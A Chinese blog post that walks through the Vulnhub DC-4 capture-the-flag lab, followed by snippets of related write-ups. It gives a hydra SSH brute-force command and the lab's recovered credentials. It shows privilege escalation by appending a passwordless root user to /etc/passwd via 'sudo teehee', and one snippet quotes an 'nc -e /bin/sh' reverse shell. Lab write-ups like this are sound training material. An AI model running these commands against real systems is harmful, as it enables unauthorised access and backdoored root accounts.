Vulnhub DC-4

最新推荐文章于 2023-01-28 18:25:03 发布

柠檬木有枝qwq

最新推荐文章于 2023-01-28 18:25:03 发布

阅读量246

点赞数

分类专栏： Web

本文链接：https://blog.csdn.net/qq_39293438/article/details/95919726

版权

Web 专栏收录该内容

30 篇文章 1 订阅

订阅专栏

Nmap 扫描主机，nmap -sS 192.168.6.0/24

访问服务是一个登陆页面，使用 burp 爆破用户名为 admin，密码为 happy

/home/jim/backups 下发现 old-passwords.bak

读取一下

使用 hydra 爆破 ssh：hydra -l jim -P password.txt 192.168.6.130 ssh

用户名：jim，密码：jibril04

登陆后发现 mbox 和 test.sh

猜测可能是邮件服务，进入目录 /var/mail

发现用户名：Charles 密码：^xHhA&hvim0y

切换到 charles，查看可以运行的命令

echo "superuser::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

写入一个 root 权限的用户到 /etc/passwd,提权成功

参数解释：

#如：admin:x:0:0::/home/admin:/bin/bash

#[用户名]：[密码]：[UID]：[GID]：[身份描述]：[主目录]：[登录shell]

获取到 flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

柠檬木有枝qwq

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

VulnHub—DC-4

weixin_39219503的博客

01-31

284

01 环境搭建靶机环境下载：https://www.vulnhub.com/entry/dc-4,313/ 题目信息如下，只有一个flag Description DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration te...

【vulnhub】---DC-4靶机

qq_43168364的博客

08-21

1961

目录一、实验环境二、信息收集三、渗透测试　　1、漏洞发现和利用　　2、提权四、总结一、实验环境靶机：DC-4靶机(192.168.15.152) 攻击机：kali Linux(192.168.15.129) 二、信息收集主机发现端口扫描版本探测和操作系统识别 web指纹识别网站目录扫描三、渗透测试 1、漏洞发现和利用 2、提权四、总结渗透步骤渗透思路 ......

参与评论您还未登录，请先登录后发表或查看评论

Vulnhub-DC-4

KAKA的博客

07-04

297

扫描获取目标 IP 地址:192.168.67.135 nmap -sn 192.168.67.0/24 扫描目标，获取系统信息和开放端口：80 && 22 nmap -A -p- 192.168.67.135 （初步猜想就是通过 web 获取到系统用户密码，再通过 ssh 登陆最后提权的思路）登陆 http://192.168.67.135 ：首先看下 wapplayzer，发现是 Nginx ，但暂时得不到详细版本，故先记录，以防备用页面上写着：Admin Information

vulnhub-dc4

bqnagus

10-05

1181

vulnhub-dc4靶机复现

VulnHub DC: 4

spider的博客

12-01

244

下载地址 https://download.vulnhub.com/dc/DC-4.zip 从nmap 入手（靶机在192.168.1.106） nmap -sT -sV -sC 192.168.1.106 -O -p- 开放了80，22端口。先上个80看看只有一个登陆界面，尝试在username输入’or’1’='1 看看有没有sql注入。重定向回本页面。 ...

VulnHub DC-1

weixin_45682839的博客

04-13

359

VnlnHub DC-1靶场攻关攻略记录，五个flag，获得root权限。

【vulnhub】---DC-6靶机

qq_43168364的博客

08-21

681

目录一、实验环境二、信息收集三、渗透测试　　1、漏洞发现和利用　　2、提权四、总结一、实验环境靶机：靶机(192.168.15.154) 攻击机：kali Linux(192.168.15.129) 二、信息收集主机发现命令：nmap -sn 192.168.15.0/24 命令：netdiscover -i eth0 -r 192.168.15.0/24 端口扫描版本探测和操作系统识别 web指纹识别网站目录扫描三、渗透测试 1、漏洞发现和利用 2、提权四、总结渗

Vulnhub靶场 DC系列 DC-4靶场

sdfsergfr的博客

12-10

372

Vulnhub靶场 CD系列 CD-4靶场，黑盒实验，反弹shell网站，利用22端口ssh服务，kali密码爆破，得到admin用户的密码happy，登录admin用户 bp对radio位置的发送，得到密码字典 old-passwords.bak。添加反弹shell，得到密码字典 old-passwords.bak。九头蛇hydra：利用密码字典发现ssh的账号：jim密码： jibril04 。finalshell ssh连接对文件查找得到用户：Charles 密码：^xHhA&hvim0y。

Vulnhub DC-4靶场

weixin_47019868的博客

11-16

165

Vulnhub DC-4靶场

Vulnhub靶机 DC-4

菜浪马废的博客

03-23

441

信息收集 `arp-scan -l 扫描本地 nmap -sV 192.168.0.132 扫描靶机开放端口` 开放80端口，访问一下页面是个登录页面，而且可以用爆破来登录，没有验证机制安装pydictor，一个字典生成工具，用它生成一个用户名字典 git clone --depth=1 --branch=master https://www.github.com/landgrey/p...

[Vulnhub] DC-4

最新发布

weixin_63231007的博客

01-28

904

DC系列靶机-第四弹(hydra爆破密码+teehee命令提权)

[VulnHub]DC-4

cosmoslin的博客

09-07

144

VulnHub——DC-4渗透测试过程记录测试人员：cosmos 目标地址：192.168.131.130 目标账号：未知目标主机：未知信息搜集 1.netdiscover netdiscover -r 192.168.131.0/24 2.masscan masscan --rate=10000 --ports 0-65535 192.168.131.130 3.nmap nmap -A 192.168.131.130 网站测试进入网站发现需要登录,提示admin登录，猜测用户名

vulnhub靶机之DC-4

m0_52328368的博客

08-19

1163

vulnhub之dc-4详细步骤

Vulnhub渗透测试靶机DC-4

weixin_46128614的博客

01-19

475

下载地址：https://www.vulnhub.com/entry/dc-4,313/ nmap没有扫描到什么有用端口直接访问80端口只有一个认证框没有验证 bp爆破admin弱密码发现密码admin qwert 进入后台发现有执行命令的地方抓包发现命令由post包传过去执行的命令由客户端传到了服务端命令执行获取shell 把nc -e /bin/sh 192.168.49...

vulnhub靶场，DC-4

kukudeshuo的博客

07-12

314

vulnhub靶场，DC-4 环境准备攻击机：kali（192.168.58.130）靶机：DC-4（192.168.58.147）下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境，启动即可，将网段设置为NAT模式信息收集使用arp-scan确定目标靶机确定目标靶机IP为192.168.58.147 使用nmap扫描查看目标靶机端口开放情况开放端口：22、80 浏览器访问目标靶机的80端口就是一个登入页面，不知道账号密码，所以没有多大用处网站目录扫描

Vulnhub靶机渗透测试——DC-4

Cobra的博客

05-03

1783

一、实验环境攻击机（kail）:192.168.189.148 靶机（ubuntu）：192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183，再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口，访问其80端口，是一个登录框 4、在对其进行SQL注入，目录扫描无果后，果断选择暴力破解..

Vulnhub靶场渗透-DC-4

paidx0

10-21

263

前言靶机IP（192.168.110.134）攻击机IP（192.168.110.127）网络NAT模式信息收集访问80端口，提示以admin的用户名登录直接爆破了，爆破结果是 admin：happy 漏洞利用登录进去发现是个可以RCE的思路是不是来了，很显然直接弹shell了怎么弹shell就不多说了，我的靶场笔记很多都有写存在三个用户进入jim的backups文件夹发现了很多的旧密码，思路这不就又来了开放ssh服务，很显然是要我们去爆破了拿到jim的账号了，登

vulnhub 入门DC-4

weixin_52780973的博客

01-01

223

vulnhub 实战靶机 linux teehee提权 hydra爆破登录框 ssh连接收到mail

DC-DC电路电感选择深度解析

"DC-DC电路中电感的选择关乎到开关电源设计的效率与稳定性。电感不仅是LC滤波电路的组成部分，其行为在开关电源的降压转换中扮演着关键角色。电感的选择需要考虑电感值、电流承受能力、绕线电阻以及机械尺寸等因素。...